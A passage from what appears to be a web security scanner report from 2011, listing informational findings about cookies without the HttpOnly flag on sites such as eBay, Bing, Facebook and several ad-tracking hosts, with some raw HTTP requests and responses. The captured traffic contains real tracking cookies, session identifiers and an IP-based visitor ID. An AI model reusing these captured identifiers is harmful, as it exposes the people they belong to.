M01=AAAACOACQgAE; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
TC01=QBIPKvOUMBAAAEALjElDAAAAAAAQGAAABPkbGAktwIAS1aCQmdiAI; Domain=main.ebayrtm.com; Expires=Wed, 18-Jul-2012 18:36:18 GMT; Path=/rtm
RUA=D1AQAAATErF7ITAAYZchzOJQkAi5g%2BSQv3HKquZ2UrSVcKqhXgTu2GgiVmuErKwnKU3EYCaSfQGfK4sdpUu7I77It5rkG%2FanWo9FEvGie%2FiCjYBRuz%2Bu%2BZVv%2BrRQ6jwbWnCXh61dKhTowAEb5BjV%2B5KPdxZawyqSMM9g7Pi697Ovt5X8I8Ko%2Ffi7lhEUATgXz%2F%2Bm47HrMTGxCPDyF%2F3CYZ; Domain=main.ebayrtm.com; Expires=Thu, 18-Jul-2013 18:36:18 GMT; Path=/rtm
RUP=D1AQAAATErF7ITAAZS1xanS0Gk9aSM%2BmfKsGDaavNO5bWn4V4sSMYKOyEr1u1UDyQ*; Domain=ebayrtm.com; Expires=Thu, 18-Jul-2013 18:36:18 GMT; Path=/rtm
HT=1311100529004%02433%04165364%06142708%03829%04-1%060%03827%04-1%060%03825%04174461%06154106%03699%04-1%060%031595%04184241%06144661%03912%04-1%060%03974%04-1%060%03973%04187759%06167625%03876%04-1%060%031651%04-1%060%03813%04-1%060%031650%04-1%060%03283%04153923%0699446%03280%04153917%0699446; Domain=main.ebayrtm.com; Path=/rtm

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.127. https://ssl.bing.com/travel/secure/account/overview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl.bing.com
Path:	/travel/secure/account/overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_HOP=I=2&TS=1311118711; domain=.bing.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.128. http://statse.webtrendslive.com/dcs2jv4o900000oa88gtwa3au_6v2h/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/dcs2jv4o900000oa88gtwa3au_6v2h/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAATAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NjdYAAN3DBE6bwwROi4cAAOQfDU7kHw1OBMgAAHv8HE7u+xxOzEsAAH2IHU5PiB1OyuYAAA+THU4Pkx1On/oAADPmJE4a5SROnPoAAKySJU6skiVOEQAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TUVFAADdwwROm8METs84AADkHw1O5B8NTsZJAAB7/BxO7vscTmseAAB9iB1OT4gdTlhMAAAPkx1OD5MdTkpQAAAz5iROGuUkTgZQAACskiVOrJIlTgEAAAAEyAAAIzE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0; path=/; expires=Fri, 16-Jul-2021 14:20:28 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs2jv4o900000oa88gtwa3au_6v2h/dcs.gif?&dcsdat=1311085235630&dcssip=www.numarasoftware.com&dcsuri=/welcome/service_desk.aspx&dcsqry=%3Fsrc=google%26trm=issue_tracking_software&WT.co_f=173.193.214.243-1234505376.30151644&WT.vtid=173.193.214.243-1234505376.30151644&WT.vtvs=1311085235633&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=9&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=/welcome/service_desk.aspx&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x723&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.numarasoftware.com/welcome/service_desk.aspx&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&trm=issue_tracking_software
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAASAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NjdYAAN3DBE6bwwROi4cAAOQfDU7kHw1OBMgAAHv8HE7u+xxOzEsAAH2IHU5PiB1OyuYAAA+THU4Pkx1On/oAADPmJE4a5SROEAAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TUVFAADdwwROm8METs84AADkHw1O5B8NTsZJAAB7/BxO7vscTmseAAB9iB1OT4gdTlhMAAAPkx1OD5MdTkpQAAAz5iROGuUkTgEAAAAEyAAAIzE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 14:20:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0AAAAAAATAAAADroAABtA0U3lP9FNFf8AAHZR0U1aUdFNJugAAExR0k2LT9JNP/0AAAdQ0k2xT9JNPv0AAEZR0k04UNJNCJkAAGqN301qjd9NFd8AAFB97k3dfO5NOrkAALl98k25ffJN91EAAGxC+U1rQvlNfA0BAKzD+00jwftNLbAAAH6i/k18ov5NQKYAAOI4/03gOP9NjdYAAN3DBE6bwwROi4cAAOQfDU7kHw1OBMgAAHv8HE7u+xxOzEsAAH2IHU5PiB1OyuYAAA+THU4Pkx1On/oAADPmJE4a5SROnPoAAKySJU6skiVOEQAAAEkfAAAbQNFN5T/RTXtQAAB2UdFNWlHRTR5MAABMUdJNi0/STQgrAABqjd9Nao3fTUFNAABQfe5N3XzuTcxEAAC5ffJNuX3yTSUiAABsQvlNa0L5Tc5SAACsw/tNI8H7TURFAAB+ov5NfKL+TaI8AADiOP9N4Dj/TUVFAADdwwROm8METs84AADkHw1O5B8NTsZJAAB7/BxO7vscTmseAAB9iB1OT4gdTlhMAAAPkx1OD5MdTkpQAAAz5iROGuUkTgZQAACskiVOrJIlTgEAAAAEyAAAIzE3My4xOTMuMjE0LjI0My0xMjM0NTA1Mzc2LjMwMTUxNjQ0; path=/; expires=Fri, 16-Jul-2021 14:20:28 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.129. https://support.discoverbing.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.discoverbing.com
Path:	/Default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MSIDCookie=b3669c96-3886-4430-9363-3e7a37fa4b8a; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.130. http://t2.trackalyzer.com/trackalyze.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t2.trackalyzer.com
Path:	/trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

loop=http%3A%2F%2Fwww%2Eaxosoft%2Ecom%2Fontime%2Fbug%5Ftracking; expires=Wed, 20-Jul-2011 07:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=http%3A//www.axosoft.com/ontime&p=http%3A//www.axosoft.com/ontime/bug_tracking&i=18629 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.axosoft.com/ontime/bug_tracking
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=251737230614108; ASPSESSIONIDSSDCBDSR=AELIBEPBNDEEFGNGIGDFIMHO; loop=http%3A%2F%2Fwww%2Eaxosoft%2Ecom%2Fontime; ASPSESSIONIDQQBBCCTR=IPJNGPLCKGCCBBMNKNANFDCF

Response

HTTP/1.1 302 Object moved
Date: Tue, 19 Jul 2011 14:20:06 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Eaxosoft%2Ecom%2Fontime%2Fbug%5Ftracking; expires=Wed, 20-Jul-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>

14.131. http://tags.bluekai.com/site/2731 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2731

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=DLpRi65dzaRBvF/1; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com
bkc=KJh56ENn96WxOrOlf686wE2bwfODWvLe6PMjoMCEHR+QsLcvNi/vYoJsnnuJt9AueYoJWSNDNYF2a6v6Wus/i3DpAVWpP06wIXfmfs8iQ1R/zn1NWULGMuqAKL3aywkMWYCVeESrht14jhNcA23zaN5XGJxOfi/qCdCzjq47+P2EwogPwA0jptzwAn74r4DbdEy9fnKVDEboS52V7YdfQVREK1IwAP+Ef/V0BFzEw8O+9oHwqDhw9dqpMeq7hDdAAwnqIXf8EVlmi0IsQmAgQIPN8b29ZdwiTjerIy1L8j0pAEq7hEL2ymXvXJJNnQqSCublSqbeUG1AzFSdGjyn+qkKUvV2EJdOR847DrSXtan2d4cddTgU2gxU5fP8a4XOYOi1jQ==; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com
bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101u8XGIGc9W5lOCL=; expires=Sun, 15-Jan-2012 20:43:29 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.132. http://tags.bluekai.com/site/450 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/450

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bklc=4e25ec55; expires=Thu, 21-Jul-2011 20:43:01 GMT; path=/; domain=.bluekai.com
bk=6XdZv65dzaRBvF/1; expires=Sun, 15-Jan-2012 20:43:01 GMT; path=/; domain=.bluekai.com
bkc=KJh56qXFOWWDOdeFfvTyNGdKM0QPG+oWmJUti7UPDPhz/NaoaD5Y/+K/QrjWJ8WnmDJhP9it2a2/61Qka6sDlMFKpqt+Jod12XNXJ2wGOToPQ2Vg65McXUYec/Ngayv67HMQzQiTUCInwjHSFAijXIvve8x0ysNATh94uIpZMwjg0F+Et7LoXd7LwMnlmfaK38XcQwltRoxwEfPFvL87FDY2egp7Htnpf2Z0B+X7Fi4qOYQ4tqS4JgD8nlTAC8E4tccmgtkpUkyq9YqmeHjV7eXeqzbnO6Bbfpzy7lwmH+3zat2t9EInycwVrHCGapgzocbflxjJ8mhdxEAUSFmXrWofZHbeCy8woXh8LSU8rTmddhDFqtFwqV7pvFTa6IvJwy==; expires=Sun, 15-Jan-2012 20:43:01 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.133. http://tap.rubiconproject.com/oz/feeds/targus/profile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cd=false; Domain=.rubiconproject.com; Expires=Wed, 18-Jul-2012 20:27:49 GMT; Path=/
dq=100|10|90|0; Expires=Wed, 18-Jul-2012 20:27:49 GMT; Path=/
xdp_ti="19 Jul 2011 20:27:49 GMT"; Version=1; Max-Age=604800; Path=/
lm="19 Jul 2011 20:27:49 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.134. http://tap.rubiconproject.com/oz/sensor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cd=false; Domain=.rubiconproject.com; Expires=Wed, 18-Jul-2012 20:26:08 GMT; Path=/
dq=97|8|89|0; Expires=Wed, 18-Jul-2012 20:26:08 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.135. http://video.msn.com/services/user/info previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://video.msn.com
Path:	/services/user/info

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; domain=msn.com; expires=Tue, 26-Jul-2011 15:16:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.136. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aaa.com
Path:	/scripts/WebObjects.dll/ZipCode.woa/wa/route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:09 GMT; path=/; domain=aaa.com
zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:09 GMT; path=/; domain=aaa.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.137. http://www.adminitrack.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adminitrack.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AT=VISITOR=Y; expires=Wed, 18-Jul-2012 14:20:31 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?gclid=COjL1IrNjaoCFQ495QodxUaNzg HTTP/1.1
Host: www.adminitrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

14.138. http://www.burstnet.com/enlightn/7117//930F/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/7117//930F/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^13v.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:26:02 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.139. http://www.burstnet.com/enlightn/7121//7128/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/7121//7128/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:27:34 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:27:34 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:27:34 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

14.140. http://www.burstnet.com/enlightn/7177//7F4D/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/7177//7F4D/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:26:48 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:26:48 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GGd^15X.1F0r^16U.1F0r^1As.1EWG^13V.1EcU^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Thu, 19-Jul-2012 20:26:48 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

14.141. http://www.clickmanage.com/events/clickevent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clickmanage.com
Path:	/events/clickevent.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=21367747-2c53-4cc6-a391-4d75cc92d57b; expires=Wed, 18-Jul-2012 14:20:23 GMT; path=/
cp=10332,634466676237062500,4,1044996461,599266080000000000,0*|; expires=Wed, 18-Jul-2012 14:20:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events/clickevent.aspx?ca=10332&e=4&l=1044996461&u=http%25253A%25252F%25252Fwww.numarasoftware.com%25252Fwelcome%25252Fservice_desk.aspx%25253Fsrc%25253Dgoogle%252526trm%25253Dissue_tracking_software&gclid=CIGmsIfNjaoCFct95QodzRHo0Q HTTP/1.1
Host: www.clickmanage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 14:20:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
P3P: policyref="http://www.clickmanage.com/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&trm=issue_tracking_software
Set-Cookie: uid=21367747-2c53-4cc6-a391-4d75cc92d57b; expires=Wed, 18-Jul-2012 14:20:23 GMT; path=/
Set-Cookie: cp=10332,634466676237062500,4,1044996461,599266080000000000,0*|; expires=Wed, 18-Jul-2012 14:20:23 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 215

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&trm=issue_tracking_software'>here</a>.</h2>
<
...[SNIP]...

14.142. http://www.facebook.com/advertising/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/advertising/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.143. http://www.facebook.com/badges/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fbadges%2F%3Fref%3Dpf; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.144. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.145. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.146. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.147. http://www.facebook.com/facebook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/facebook

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.148. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.149. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.123.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 22399

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="af0Z";</script><noscript>
...[SNIP]...

14.150. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.151. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.125.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:29 GMT
Content-Length: 32607

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/pages\/create.php";window._EagleEyeSeed="F3jP";</script><
